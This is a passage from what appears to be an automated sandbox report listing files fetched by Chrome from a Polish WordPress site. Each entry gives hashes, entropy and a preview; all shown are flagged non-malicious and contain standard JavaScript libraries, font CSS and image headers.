                                                            Preview:......JFIF.............jExif..II*...............'...........................................................................(...........1...........2...........i.....................................Adobe Photoshop CC (Macintosh)..2018:10:09 16:08:43...........0221....................V...........!.............................`...........h...(...................p.........................................JFIF.....^.^.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......t...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (65447)
                                                            Category:dropped
                                                            Size (bytes):89521
                                                            Entropy (8bit):5.289973268315515
                                                            Encrypted:false
                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1vM:DIh8GgP3hujzwbhd3XvSiDQ47GKq
                                                            MD5:02DD5D04ADD4759122013C5AB4DC5CC2
                                                            SHA1:A45A56E396AC549B4FF39B696CE9E0C16A7612DE
                                                            SHA-256:BD4DE6A3FC0FB68D6F76BA7B93514B96A92E585C295B5351C31AD92A4B0777EA
                                                            SHA-512:04690D9875E98F5AE6BF94F5C71B7A0177B374BC09609A0F58312E1C337348749A40E07FE226737DC248BD8FE2F6A489071258619AFFC7F1DF644E4255159615
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 592 x 256, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):11139
                                                            Entropy (8bit):7.943057558161918
                                                            Encrypted:false
                                                            SSDEEP:192:+S0tKg9E05T06B9gWP6yaDK5Eh7vKbFSOCjQxeS4JrhK7bX6EihXvaeSbl:yXE05I8KWzkvq5CjNh6DOfXW
                                                            MD5:EC917CF95CD77D05E335610B7EC08BB3
                                                            SHA1:821CFF18C11C70340028E0CD61AF4D1C0B67D9CB
                                                            SHA-256:1CEFABD7EAA3615CB804216526C478A916E24BE8D10D11BA7D02717003AC84E6
                                                            SHA-512:3345B79959D9A2C42858752551248898EE6B17519259C51ECA1322C3556AB0276AA90F045ED052FF9687BC93CCC91B2F16FB8FBBD6F1626830AC147D1520D176
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...P.........|.H/....pHYs...#...#.x.?v...OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Web Open Font Format, TrueType, length 12460, version 0.0
                                                            Category:downloaded
                                                            Size (bytes):12460
                                                            Entropy (8bit):6.251802057516729
                                                            Encrypted:false
                                                            SSDEEP:192:zWo5nRzL/7i1Xgk2mNnRtkaP91lOBOoSxvxYOU/l/SAjS74O0iY1OulPV2K:zWophG19NXrKBaxpstqA6ud5
                                                            MD5:2B638C57E63BE4A35504A36C38DD6528
                                                            SHA1:296887E23A3514B712A0B3E865B6D5EA66872AF4
                                                            SHA-256:B00532E85BB417E1DDA28BD134F49A139DF8D1DB24A96D2A681EC8986E95BF75
                                                            SHA-512:AC90FFE8809C10D24AC9A1895B830392E0A46410491EB043A29630FF556E9D8DC933A27967837FA439FE5F93B7E8AAA694AC9614B84C7907415349B867165AAA
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/css/fonts/icomoon.woff
                                                            Preview:wOFF......0.......0`........................OS/2.......`...`....cmap...h...<...<.6.Dgasp................glyf......)d..)d.B'ihead..-....6...6./.(hhea..-H...$...$....hmtx..-l.........V..loca...d...~...~....maxp....... ... .G..name../..........J..post..0.... ... ...............................3...................................@.........@...@............... .............4...............4...............4...............2. ....... ...$.4.6.R.V.[.g.t.v................. ............ ...#.4.6.P.T.[.g.t.v................. ........... ..............................*.!.....5...............................................................0....................... ... ...................#...$.......4...4.......6...6.......P...R.......T...V..."...[...[...%...g...g...&...t...t...'...v...v...(...........)...........*...........+...........-.........../...........0...........1...........3... ... ...4...........5.........<...........=......................79..................79..................79....
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text, with very long lines (14649)
                                                            Category:downloaded
                                                            Size (bytes):17230
                                                            Entropy (8bit):5.424048318777379
                                                            Encrypted:false
                                                            SSDEEP:384:GEsMgHW5MpTcaGd+lhomA581KQoZRY5y6pHh1puOYFd:G3MEhh/AmKr25y6pHa
                                                            MD5:ACD0ACD6836185B288CCB9F5E023ED70
                                                            SHA1:24A72AF088BA056AC9A89E3E94D28807E1A6C5CB
                                                            SHA-256:D0623A42EDAFCA4A9BF949AEB498DBFBE09342F0D4D08A319A2B6E18C929EE10
                                                            SHA-512:7608813DDF1AE58EE1023EC55DF1715AD65110C7D15910391D36C844DD322FC1475456C8A6E49E3E69194F37977304887EF7C11E428FBCFC659A2756B3D85BB8
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/js/modernizr.js?ver=2.6.2
                                                            Preview:/* Modernizr 2.8.3 (Custom Build) | MIT & BSD. * Build: http://modernizr.com/download/#-fontface-backgroundsize-borderimage-borderradius-boxshadow-flexbox-flexboxlegacy-hsla-multiplebgs-opacity-rgba-textshadow-cssanimations-csscolumns-generatedcontent-cssgradients-cssreflections-csstransforms-csstransforms3d-csstransitions-applicationcache-canvas-canvastext-draganddrop-hashchange-history-audio-video-indexeddb-input-inputtypes-localstorage-postmessage-sessionstorage-websockets-websqldatabase-webworkers-geolocation-inlinesvg-smil-svg-svgclippaths-touch-webgl-shiv-cssclasses-prefixed-teststyles-testprop-testallprops-hasevent-prefixes-domprefixes-load. */.;window.Modernizr=function(a,b,c){function C(a){j.cssText=a}function D(a,b){return C(n.join(a+";")+(b||""))}function E(a,b){return typeof a===b}function F(a,b){return!!~(""+a).indexOf(b)}function G(a,b){for(var d in a){var e=a[d];if(!F(e,"-")&&j[e]!==c)return b=="pfx"?e:!0}return!1}function H(a,b,d){for(var e in a){var f=b[a[e]];if(f!==c)
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (1923)
                                                            Category:downloaded
                                                            Size (bytes):27385
                                                            Entropy (8bit):4.874011909116209
                                                            Encrypted:false
                                                            SSDEEP:768:EPBhIpsOBZuMM/VyRj1P4aPxCla5VGRpIkyiPvVsTtVKMCZQ:8n8B2VKLIPbyMvHM1
                                                            MD5:66D3E595C9F345BB0FDF8C68BAA06E92
                                                            SHA1:2FE1A56F0309183AC02CF0810F2412A32C7946FD
                                                            SHA-256:D321883B294EE82D443E947EC0747398862A3E4BEBBBA3DF0BAD105F1B73CF52
                                                            SHA-512:B8ED18F01A20CCF1C66D121ABB1EC911290A0183FB25A82C118CC269408EDE6B0CF253FFAA2370C72481EE4C3289DAFC3AA8369EE8EDB85399D6F805326792C2
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/plugins/js_composer_salient/assets/js/dist/js_composer_front.min.js?ver=4.12.1
                                                            Preview:function vc_js() {. vc_toggleBehaviour(), . vc_tabsBehaviour(), . vc_accordionBehaviour(), . vc_teaserGrid(), . vc_carouselBehaviour(), . vc_slidersBehaviour(), . vc_prettyPhoto(), . vc_googleplus(), . vc_pinterest(), . vc_progress_bar(), . vc_plugin_flexslider(),. vc_google_fonts(), . vc_gridBehaviour(), . vc_rowBehaviour(), . vc_ttaActivation();. /* nectar addition */ . /*jQuery(document).trigger("vc_js"), window.setTimeout(vc_waypoints, 500)*/. /* nectar addition end */ .}..function getSizeName() {. var screen_w = jQuery(window).width();. return screen_w > 1170 ? "desktop_wide" : screen_w > 960 && 1169 > screen_w ? "desktop" : screen_w > 768 && 959 > screen_w ? "tablet" : screen_w > 300 && 767 > screen_w ? "mobile" : 300 > screen_w ? "mobile_portrait" : "".}..function loadScript(url, $obj, callback) {. var script = document.createElement("script");. script.type = "text/javascript", script.readyState && (script.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (6406), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):6406
                                                            Entropy (8bit):4.992272460627089
                                                            Encrypted:false
                                                            SSDEEP:192:qgigKTzsXiwDL+M4R76qiY8qgx8s9Zqar4h6ki:FHDgt6CE9Z8h63
                                                            MD5:8FE2803A01C9FA77CB1A2618C3552DCE
                                                            SHA1:2230DD8F0604E4328E7C2A3F9437A6BF2986F592
                                                            SHA-256:E87A1C5E24F9A7C7DCB437417F0B05B0A3C12947CE32D65C990C988A8B5ED4D7
                                                            SHA-512:3F808D49BA7DE395294809EC0C940D6BDB380ED5B3538A69D135A6A97A153DC0B218C0F212FF5B85E45FECF61979BCD5E233ACA020CA6CEED94068225F78AA91
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:var runtime=function(a){"use strict";var u,t=Object.prototype,h=t.hasOwnProperty,r="function"==typeof Symbol?Symbol:{},n=r.iterator||"@@iterator",e=r.asyncIterator||"@@asyncIterator",o=r.toStringTag||"@@toStringTag";function i(t,r,e){return Object.defineProperty(t,r,{value:e,enumerable:!0,configurable:!0,writable:!0}),t[r]}try{i({},"")}catch(t){i=function(t,r,e){return t[r]=e}}function c(t,r,e,n){var o,i,a,c,r=r&&r.prototype instanceof d?r:d,r=Object.create(r.prototype),n=new j(n||[]);return r._invoke=(o=t,i=e,a=n,c=l,function(t,r){if(c===p)throw new Error("Generator is already running");if(c===y){if("throw"===t)throw r;return k()}for(a.method=t,a.arg=r;;){var e=a.delegate;if(e){var n=function t(r,e){var n=r.iterator[e.method];if(n===u){if(e.delegate=null,"throw"===e.method){if(r.iterator.return&&(e.method="return",e.arg=u,t(r,e),"throw"===e.method))return v;e.method="throw",e.arg=new TypeError("The iterator does not provide a 'throw' method")}return v}var n=f(n,r.iterator,e.arg);if("t
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text
                                                            Category:downloaded
                                                            Size (bytes):8583
                                                            Entropy (8bit):5.5253924724494
                                                            Encrypted:false
                                                            SSDEEP:192:8n6snindnUinVen1yamh+gsEJkQ29lMkQ29qkQ29OXkQ299FN2om/mN2vpN2btH5:vbXXJl29lMl29ql29ml299L2R/62v/2P
                                                            MD5:700BF79D309E9E80B94CFAE90D3DB36C
                                                            SHA1:F3831485327821E7351BEF122FC3645E8256CC4D
                                                            SHA-256:83DFC12B764F31DC3C1FA6EC5E2256089774C728AD7CF5E2E345348C3E9A1F54
                                                            SHA-512:34B667465D194BBFE09ED5EA26285DFAE2BF17C0CAFD7A8B6A6474D96DC0A1E6022AC67C93D05795A352DC59ECFF1C13FA2A0E0DFE089C09522D0A0F1BF59ABB
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://fonts.googleapis.com/css?family=Didact+Gothic%3A400%7CPlayfair+Display%3A400%2C700%2C400italic%7CMontserrat&subset=latin&ver=1621669621
                                                            Preview:/* cyrillic-ext */.@font-face {. font-family: 'Didact Gothic';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/didactgothic/v20/ahcfv8qz1zt6hCC5G4F_P4ASlUaYpnLl.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Didact Gothic';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/didactgothic/v20/ahcfv8qz1zt6hCC5G4F_P4ASlU-YpnLl.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Didact Gothic';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/didactgothic/v20/ahcfv8qz1zt6hCC5G4F_P4ASlUeYpnLl.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Didact Gothic';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/didactgothic/v
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (2949)
                                                            Category:dropped
                                                            Size (bytes):2984
                                                            Entropy (8bit):5.176730561540549
                                                            Encrypted:false
                                                            SSDEEP:48:Q7A9/XN5NjJE2aAOuRQLKfTnwAuw5BJFVhl2qFqycynUPzm6uuPkSEwE/ZGkrXyl:931HfUAJ5F/FqyPUC6uBIkrXyAESyO16
                                                            MD5:3B59C3B33879D70B46063089EC505E03
                                                            SHA1:4054DBF1C08E09D8514DF72DBE137D02EFAE907A
                                                            SHA-256:143CE443C390DB3B8598F951DE20BD04623859A581A15B8CDE43EBFA1F8EC103
                                                            SHA-512:7CCA3C9B3E33AAA441FB38C7CDA42719B12DFD462BAD17723E4286398517322806E0164353E5ECD9D85DCB8064D009A7688797912DEFFCA4D8F12ED1B9184F6A
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*! This file is auto-generated */.window.addComment=function(v){var I,C,h,E=v.document,b={commentReplyClass:"comment-reply-link",commentReplyTitleId:"reply-title",cancelReplyId:"cancel-comment-reply-link",commentFormId:"commentform",temporaryFormId:"wp-temp-form-div",parentIdFieldId:"comment_parent",postIdFieldId:"comment_post_ID"},e=v.MutationObserver||v.WebKitMutationObserver||v.MozMutationObserver,r="querySelector"in E&&"addEventListener"in v,n=!!E.documentElement.dataset;function t(){d(),e&&new e(o).observe(E.body,{childList:!0,subtree:!0})}function d(e){if(r&&(I=g(b.cancelReplyId),C=g(b.commentFormId),I)){I.addEventListener("touchstart",l),I.addEventListener("click",l);var t=function(e){if((e.metaKey||e.ctrlKey)&&13===e.keyCode)return C.removeEventListener("keydown",t),e.preventDefault(),C.submit.click(),!1};C&&C.addEventListener("keydown",t);for(var n,d=function(e){var t=b.commentReplyClass;e&&e.childNodes||(e=E);t=E.getElementsByClassName?e.getElementsByClassName(t):e.querySele
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 text
                                                            Category:downloaded
                                                            Size (bytes):8092
                                                            Entropy (8bit):5.390864637687013
                                                            Encrypted:false
                                                            SSDEEP:192:pl+Or8ur83V33R3hqRAsfAy4MOr8ur83V33R3hqP:zZr8ur83VHBhm+r8ur83VHBhq
                                                            MD5:3D07DE5229AE9E4BA05346E95DE796BB
                                                            SHA1:8142F69063F7F5DB40F7DC98D73F77FACFCBF6C7
                                                            SHA-256:CCA36D46191C4D5D81C3BC0B990406E7609A35221B771B1ED1E5BBDEC6B40052
                                                            SHA-512:158AD2A74D21B5BE5A254F30BF0FE7CF0EA0C2EA6384FA0F921D1C531FCDCEBBC3770ED5D8BA44F51015BA48853205DD38568BD3BDEAA07ED1C4D4211991BE48
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/plugins/fancy-box/jquery.easing.js?ver=1.3
                                                            Preview:/*. * jQuery Easing v1.3 - http://gsgd.co.uk/sandbox/jquery/easing/. *. * Uses the built in easing capabilities added In jQuery 1.1. * to offer multiple easing options. *. * TERMS OF USE - jQuery Easing. * . * Open source under the BSD License. . * . * Copyright . 2008 George McGinley Smith. * All rights reserved.. * . * Redistribution and use in source and binary forms, with or without modification, . * are permitted provided that the following conditions are met:. * . * Redistributions of source code must retain the above copyright notice, this list of . * conditions and the following disclaimer.. * Redistributions in binary form must reproduce the above copyright notice, this list . * of conditions and the following disclaimer in the documentation and/or other materials . * provided with the distribution.. * . * Neither the name of the author nor the names of contributors may be used to endorse . * or promote products derived from this software without specific prior written permis
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (15224)
                                                            Category:dropped
                                                            Size (bytes):18181
                                                            Entropy (8bit):4.765796653390419
                                                            Encrypted:false
                                                            SSDEEP:384:cn50kJuPTb9Uh31//bEP+XgA3S9CleffJmp3:c50KU9Uh31//YWXgA6ffC3
                                                            MD5:116C86C56F8DB0BB63F15CEDA50FDC98
                                                            SHA1:75E308982ECF7CD43644B8B426E6AA1A0B0FBE26
                                                            SHA-256:DEF5DE6254BE138B8B35D680D1FDD8B07827D03B8626DAEBFEEB4157EC330EA7
                                                            SHA-512:7124C3A6D306B5AA53639A722EEB7E5CC2D144F5A698E4086BB49D5554E5E1AFCC28E096B1BF0E8D96B8751DD6D2CFAEB52D6343CECB174A81A2C49726E3369E
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*! This file is auto-generated */.// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var f={base:"https://twemoji.maxcdn.com/v/13.1.0/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return b(d);return b(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:i},onerror:function(){this.parentNode&&this.parentNode.replaceChild(g(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return("string"==typeof d?function(d,a){return o(d,function(d){var u,f,c=d,e=x(d),b=a.callback(e,a);if(e&&b){for(f in c="<img ".concat('class="',a.className,'" ','draggable="false" ','alt="',d,'"',' src="',b,'"'),u=a.attributes(d,e))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===c.indexOf(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,n),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,n,r,o,i,s,l=function d(u,f){var c,e,b=u.childNodes,a=b.length;for(;a--;)c=b[a]
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (1923)
                                                            Category:dropped
                                                            Size (bytes):27385
                                                            Entropy (8bit):4.874011909116209
                                                            Encrypted:false
                                                            SSDEEP:768:EPBhIpsOBZuMM/VyRj1P4aPxCla5VGRpIkyiPvVsTtVKMCZQ:8n8B2VKLIPbyMvHM1
                                                            MD5:66D3E595C9F345BB0FDF8C68BAA06E92
                                                            SHA1:2FE1A56F0309183AC02CF0810F2412A32C7946FD
                                                            SHA-256:D321883B294EE82D443E947EC0747398862A3E4BEBBBA3DF0BAD105F1B73CF52
                                                            SHA-512:B8ED18F01A20CCF1C66D121ABB1EC911290A0183FB25A82C118CC269408EDE6B0CF253FFAA2370C72481EE4C3289DAFC3AA8369EE8EDB85399D6F805326792C2
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:function vc_js() {. vc_toggleBehaviour(), . vc_tabsBehaviour(), . vc_accordionBehaviour(), . vc_teaserGrid(), . vc_carouselBehaviour(), . vc_slidersBehaviour(), . vc_prettyPhoto(), . vc_googleplus(), . vc_pinterest(), . vc_progress_bar(), . vc_plugin_flexslider(),. vc_google_fonts(), . vc_gridBehaviour(), . vc_rowBehaviour(), . vc_ttaActivation();. /* nectar addition */ . /*jQuery(document).trigger("vc_js"), window.setTimeout(vc_waypoints, 500)*/. /* nectar addition end */ .}..function getSizeName() {. var screen_w = jQuery(window).width();. return screen_w > 1170 ? "desktop_wide" : screen_w > 960 && 1169 > screen_w ? "desktop" : screen_w > 768 && 959 > screen_w ? "tablet" : screen_w > 300 && 767 > screen_w ? "mobile" : 300 > screen_w ? "mobile_portrait" : "".}..function loadScript(url, $obj, callback) {. var script = document.createElement("script");. script.type = "text/javascript", script.readyState && (script.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:data
                                                            Category:downloaded
                                                            Size (bytes):9866
                                                            Entropy (8bit):5.274488609421968
                                                            Encrypted:false
                                                            SSDEEP:192:To5mtfOLSBihuKYDez8407akBOEXq+4CxpktO9Norr7dFBSrSPfN:dtfOLS8huKYDezU7nr62GtO9Norr7fBH
                                                            MD5:CBAD4EC75D85DF02210165D43D02461B
                                                            SHA1:5C05CFB56BFC7334715F063D596761BAB76AA91A
                                                            SHA-256:DCEDA745A0FB58233A95EFF6D10796026DF6792CB960CDF675EB7B8A6750A2D2
                                                            SHA-512:1764A4EA191AA5F6754911614AF6FCC043FB394C02EFF95D6A2264E12CAA53C6CDA6C8B27547FC792DBFDB48DC14AD63B2AFB23293C17EEBEBD6DB2BF08BF385
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-includes/js/dist/i18n.min.js?ver=5f1269854226b4dd90450db411a12b79
                                                            Preview:/*! This file is auto-generated */.this.wp=this.wp||{},this.wp.i18n=function(t){var e={};function n(r){if(e[r])return e[r].exports;var i=e[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}return n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:r})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var i in t)n.d(r,i,function(e){return t[e]}.bind(null,i));return r},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},n.p="",n(n.s="Vhyj")}({"4Z/T":fu
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=12, description=OLYMPUS DIGITAL CAMERA , manufacturer=OLYMPUS CORPORATION, model=C8080WZ, orientation=upper-left, xresolution=218, yresolution=226, resolutionunit=2, software=Adobe Photoshop 7.0 CE, datetime=2018:07:26 14:25:14], baseline, precision 8, 500x500, components 3
                                                            Category:downloaded
                                                            Size (bytes):52878
                                                            Entropy (8bit):7.615682104172851
                                                            Encrypted:false
                                                            SSDEEP:768:0ivgGcbYy5wbC5a/ppSCZQ0GKZKei8ANktgDiktyHt9oPE+gbqa7yuDuPqbFl+p5:0DG4+/hKaXi8kxPt8R7nl+3
                                                            MD5:CAC8ABBBC533E19202CDFAA26B4AA40B
                                                            SHA1:ADDEB4832A02C1F7D3400B0D274866079D416815
                                                            SHA-256:BF2B9DB87D709849006D41589E708FDFEA96920E10F2D1B5BC4F5D2530F4D7FB
                                                            SHA-512:D14FAA93A4A9E3D2F96AB08C13F7A42FD77D8CEF912579474E18352F079BB5CE76DA533D2ACDB29CA52F00B2E612B6CFD51971962FDCDFB9CA7A1BF5D412C893
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2018/10/samoprzylepne-500x500.jpg
                                                            Preview:......JFIF.....,.,.....qExif..II*........... ...................................................................(...........1...........2...................................i.......H.......OLYMPUS DIGITAL CAMERA .OLYMPUS CORPORATION.C8080WZ.,.......,.......Adobe Photoshop 7.0 CE.2018:07:26 14:25:14.............................................................................."...........'.......2...........0220................................................................................................................}...............0100.................................................................................................................................................................................'..........2007:08:02 15:25:27.2007:08:02 15:25:27................................. ....d..........................................(.......................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (5405)
                                                            Category:dropped
                                                            Size (bytes):5440
                                                            Entropy (8bit):5.085457448295079
                                                            Encrypted:false
                                                            SSDEEP:96:BAj0uKglDu/3+GrURolI93CzaAglFYSt5s8G0QF6aVRRVKX:Sj0fglq3oRB93e+lFvt2jhKX
                                                            MD5:10EB2A823CB3051E10C7395768745F5B
                                                            SHA1:D1002D92D3B59802D22742CD8172A4EC8918FFAD
                                                            SHA-256:04E6FB814FCCCE3A0AECB83BE0BC24665CF3E6A5E993F296471A63708F63E138
                                                            SHA-512:49A09975B9100B3CDAD4A644A08B7AB4D32B0993F683C718FD14E5991BBA2C5B6287CAC4F7B5093302027623F31B7C9AA5258E373FEC59B8DED18796B283E849
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*! This file is auto-generated */.this.wp=this.wp||{},this.wp.hooks=function(n){var t={};function r(e){if(t[e])return t[e].exports;var o=t[e]={i:e,l:!1,exports:{}};return n[e].call(o.exports,o,o.exports,r),o.l=!0,o.exports}return r.m=n,r.c=t,r.d=function(n,t,e){r.o(n,t)||Object.defineProperty(n,t,{enumerable:!0,get:e})},r.r=function(n){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(n,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(n,"__esModule",{value:!0})},r.t=function(n,t){if(1&t&&(n=r(n)),8&t)return n;if(4&t&&"object"==typeof n&&n&&n.__esModule)return n;var e=Object.create(null);if(r.r(e),Object.defineProperty(e,"default",{enumerable:!0,value:n}),2&t&&"string"!=typeof n)for(var o in n)r.d(e,o,function(t){return n[t]}.bind(null,o));return e},r.n=function(n){var t=n&&n.__esModule?function(){return n.default}:function(){return n};return r.d(t,"a",t),t},r.o=function(n,t){return Object.prototype.hasOwnProperty.call(n,t)},r.p="",r(r.s="gEOj")}({gEOj:fun
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (1943)
                                                            Category:downloaded
                                                            Size (bytes):48262
                                                            Entropy (8bit):5.26640401609811
                                                            Encrypted:false
                                                            SSDEEP:768:D1x9gyeNJxz7twiurw5MfawiCoxSS8XUjjLYNUYtput/aRIM0R3:D1x9gyeNJxz7twiTYaL8S8k3LYNUYt8T
                                                            MD5:40656483C2192FC831EB4143A2952179
                                                            SHA1:CE1169A1758558B27480BED1205114F65A4DAB33
                                                            SHA-256:5D8BD6453CD02F4BE0C763AF402F43CE7ADB5630EC109BC2B01F9E5E314525C5
                                                            SHA-512:EA23FCDD0A668B67FA6827E089F01FC7B2916A3F9003877BC1488A37395B54F3D68B47E00079A5695FE4930417EB7AFF61D3A420A08F235B967D38A9372AB7FA
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/js/magnific.js?ver=7.0.1
                                                            Preview:/*! Magnific Popup - v1.0.0 - 2015-09-17.* http://dimsemenov.com/plugins/magnific-popup/.* Copyright (c) 2015 Dmitry Semenov; */.;(function (factory) { .if (typeof define === 'function' && define.amd) { . // AMD. Register as an anonymous module. . define(['jquery'], factory); . } else if (typeof exports === 'object') { . // Node/CommonJS . factory(require('jquery')); . } else { . // Browser globals . factory(window.jQuery || window.Zepto); . } . }(function($) { ../*>>core*/./**. * . * Magnific Popup Core JS file. * . */.../**. * Private static constants. */.var CLOSE_EVENT = 'Close',..BEFORE_CLOSE_EVENT = 'BeforeClose',..AFTER_CLOSE_EVENT = 'AfterClose',..BEFORE_APPEND_EVENT = 'BeforeAppend',..MARKUP_PARSE_EVENT = 'MarkupParse',..OPEN_EVENT = 'Open',..CHANGE_EVENT = 'Change',..NS = 'mfp',..EVENT_NS = '.' + NS,..READY_CLASS = 'mfp-ready',..REMOVING_CLASS = 'mfp-removing',..PREVENT_CLOSE_CLASS = 'mfp-prevent-close';.../**. * Private vars . */./*jshint -W079 */.var mfp, // As we have only
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 text, with very long lines (33376)
                                                            Category:downloaded
                                                            Size (bytes):80574
